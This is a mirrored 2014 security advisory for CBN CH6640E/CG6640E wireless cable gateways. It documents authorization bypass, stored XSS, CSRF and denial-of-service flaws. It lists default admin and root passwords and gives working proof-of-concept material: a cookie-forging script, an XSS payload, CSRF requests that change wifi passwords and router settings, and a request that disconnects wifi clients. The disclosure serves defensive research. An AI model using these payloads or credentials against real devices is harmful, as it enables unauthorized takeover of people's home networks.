Vulners
Lucene search
CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities
CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Vendor: Compal Broadband Networks (CBN), Inc.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
configuration information.
Desc: The CBN modem gateway suffers from multiple vulnerabilities including
authorization bypass information disclosure, stored XSS, CSRF and denial of
service.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
---
Authorization Bypass Information Disclosure Vulnerability
#########################################################
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
###############################################
Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>
--
<html>
<body>
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Cross-Site Request Forgery (CSRF) Vulnerability
###############################################
DDNS config:
------------
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
-----------------
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
-----------------------------------------------------
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
--------------------
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Oct 2014 00:00Current
7.4High risk
Vulners AI Score7.4